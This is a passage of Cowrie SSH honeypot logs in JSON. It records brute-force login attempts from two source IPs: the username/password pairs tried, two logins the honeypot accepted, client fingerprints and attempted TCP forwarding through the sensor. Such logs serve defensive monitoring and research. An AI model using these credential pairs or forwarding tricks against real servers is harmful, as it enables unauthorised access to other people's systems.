cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:04:35.763429Z","src_ip":"212.227.235.229","session":"919afb491bec"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-26T21:04:39.659895Z","src_ip":"212.227.235.229","session":"919afb491bec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37628,"dst_ip":"1.2.3.4","dst_port":22,"session":"a021d50ab65e","protocol":"ssh","message":"New connection: 212.227.235.229:37628 (1.2.3.4:22) [session: a021d50ab65e]","sensor":"my-vps","timestamp":"2025-08-26T21:04:40.245247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:04:40.270938Z","src_ip":"212.227.235.229","session":"a021d50ab65e"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:41.379742Z","src_ip":"212.227.235.229","session":"919afb491bec"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:04:45.937384Z","src_ip":"212.227.235.229","session":"a021d50ab65e"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-26T21:04:46.784089Z","src_ip":"212.227.235.229","session":"a021d50ab65e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37636,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b9190259913","protocol":"ssh","message":"New connection: 212.227.235.229:37636 (1.2.3.4:22) [session: 3b9190259913]","sensor":"my-vps","timestamp":"2025-08-26T21:04:46.906999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:04:46.950762Z","src_ip":"212.227.235.229","session":"3b9190259913"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:04:47.172615Z","src_ip":"212.227.235.229","session":"3b9190259913"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:50.685500Z","src_ip":"212.227.235.229","session":"a021d50ab65e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47184,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c9eee276a2","protocol":"ssh","message":"New connection: 212.227.235.229:47184 (1.2.3.4:22) [session: 13c9eee276a2]","sensor":"my-vps","timestamp":"2025-08-26T21:04:51.176695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:04:51.219501Z","src_ip":"212.227.235.229","session":"13c9eee276a2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:04:51.642416Z","src_ip":"212.227.235.229","session":"13c9eee276a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":24945,"dst_ip":"1.2.3.4","dst_port":22,"session":"4799ea198915","protocol":"ssh","message":"New connection: 212.227.125.160:24945 (1.2.3.4:22) [session: 4799ea198915]","sensor":"my-vps","timestamp":"2025-08-26T21:04:51.774997Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:51.776100Z","src_ip":"212.227.125.160","session":"4799ea198915"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25207,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1fc2bc697e4","protocol":"ssh","message":"New connection: 212.227.125.160:25207 (1.2.3.4:22) [session: d1fc2bc697e4]","sensor":"my-vps","timestamp":"2025-08-26T21:04:51.886529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:04:51.888208Z","src_ip":"212.227.125.160","session":"d1fc2bc697e4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T21:04:52.006971Z","src_ip":"212.227.125.160","session":"d1fc2bc697e4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:04:52.349400Z","src_ip":"212.227.125.160","session":"d1fc2bc697e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T21:04:52.464535Z","session":"d1fc2bc697e4"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:04:59.169299Z","src_ip":"212.227.235.229","session":"13c9eee276a2"}
{"eventid":"cowrie.login.success","username":"root","password":"alpine","message":"login attempt [root/alpine] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:05:00.525041Z","src_ip":"212.227.235.229","session":"3b9190259913"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:05:01.606615Z","session":"3b9190259913"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:01.777897Z","src_ip":"212.227.235.229","session":"13c9eee276a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:05:01.918339Z","src_ip":"212.227.235.229","session":"3b9190259913"}
{"eventid":"cowrie.session.closed","duration":"15.8","message":"Connection lost after 15.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:02.714899Z","src_ip":"212.227.235.229","session":"3b9190259913"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62337,"dst_ip":"1.2.3.4","dst_port":22,"session":"f98c176e7ca2","protocol":"ssh","message":"New connection: 212.227.235.229:62337 (1.2.3.4:22) [session: f98c176e7ca2]","sensor":"my-vps","timestamp":"2025-08-26T21:05:03.513288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:05:03.514432Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:05:03.682168Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe","message":"login attempt [felipe/felipe] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:04.533619Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe1","message":"login attempt [felipe/felipe1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:05.692042Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe123","message":"login attempt [felipe/felipe123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:07.282975Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43218,"dst_ip":"1.2.3.4","dst_port":22,"session":"445885e47385","protocol":"ssh","message":"New connection: 212.227.235.229:43218 (1.2.3.4:22) [session: 445885e47385]","sensor":"my-vps","timestamp":"2025-08-26T21:05:07.855973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:05:07.899291Z","src_ip":"212.227.235.229","session":"445885e47385"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:05:08.129416Z","src_ip":"212.227.235.229","session":"445885e47385"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe1234","message":"login attempt [felipe/felipe1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:08.421365Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe12345","message":"login attempt [felipe/felipe12345] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:09.555449Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:10.712218Z","src_ip":"212.227.235.229","session":"f98c176e7ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48500,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3ecc67f7228","protocol":"ssh","message":"New connection: 212.227.235.229:48500 (1.2.3.4:22) [session: b3ecc67f7228]","sensor":"my-vps","timestamp":"2025-08-26T21:05:11.223101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:05:11.632424Z","src_ip":"212.227.235.229","session":"b3ecc67f7228"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-